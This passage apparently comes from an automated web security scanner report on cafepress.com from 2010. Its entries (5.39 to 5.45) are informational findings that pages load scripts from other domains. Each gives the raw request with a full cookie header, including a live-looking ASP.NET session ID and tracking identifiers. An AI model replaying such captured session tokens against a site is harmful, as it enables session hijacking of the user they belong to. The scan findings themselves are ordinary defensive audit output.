ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59652 Date: Sun, 26 Dec 2010 13:44:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/ Set-Cookie: cp_sc=100093; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:59 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59652 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content0.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.39. http://www.cafepress.com/+womens-thongs
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+womens-thongs
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+womens-thongs HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 61274 Date: Sun, 26 Dec 2010 13:47:00 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/ Set-Cookie: cp_sc=100115; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 61274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.40. http://www.cafepress.com/+yoga-mats
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/+yoga-mats
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+yoga-mats HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59469 Date: Sun, 26 Dec 2010 13:48:43 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/ Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:42 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59469 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.41. http://www.cafepress.com/1/1/index1.html
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.cafepress.com
Path:
/1/1/index1.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js
Request
GET /1/1/index1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 142089 Content-Type: text/html; charset=utf-8 Date: Sun, 26 Dec 2010 13:48:59 GMT Connection: close Set-Cookie: slx_session=3fd981e9a190058ee83a397fe8f24ad83ebc6679; path=/ Cache-Control: no-cache, proxy-revalidate, max-age=10 Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <body> <script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"> </script>...[SNIP]...
5.42. http://www.cafepress.com/1/1/indexd1.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /1/1/indexd1.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js
Request
GET /1/1/indexd1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 149438 Content-Type: text/html; charset=utf-8 Date: Sun, 26 Dec 2010 13:48:59 GMT Connection: close Set-Cookie: slx_session=4acaabeaecefdd8dff9a0090c3edc432b686b9f4; path=/ Cache-Control: no-cache, proxy-revalidate, max-age=10 Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <body> <script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"> </script>...[SNIP]...
5.43. http://www.cafepress.com/1/3/index1.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /1/3/index1.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js
Request
GET /1/3/index1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 129977 Content-Type: text/html; charset=utf-8 Date: Sun, 26 Dec 2010 13:49:04 GMT Connection: close Set-Cookie: slx_session=400f6b47f695c657eb3c14bc7e3e4a27523d7ef2; path=/ Cache-Control: no-cache, proxy-revalidate, max-age=10 Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <body> <script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"> </script>...[SNIP]...
5.44. http://www.cafepress.com/1/3/indexb1.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /1/3/indexb1.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js
Request
GET /1/3/indexb1.html HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 145045 Content-Type: text/html; charset=utf-8 Date: Sun, 26 Dec 2010 13:49:04 GMT Connection: close Set-Cookie: slx_session=10526678dae4a1b5ae00b9cc20c52864241e4c1d; path=/ Cache-Control: no-cache, proxy-revalidate, max-age=10 Expires: -1 Pragma: no-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.o...[SNIP]... </script> <script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... <body> <script type="text/javascript" src="http://trace.tilted.youramigo.com/trace.js"> </script>...[SNIP]...
5.45. http://www.cafepress.com/1/3/indexc1.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /1/3/indexc1.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://trace.tilted.youramigo.com/trace.js
Request
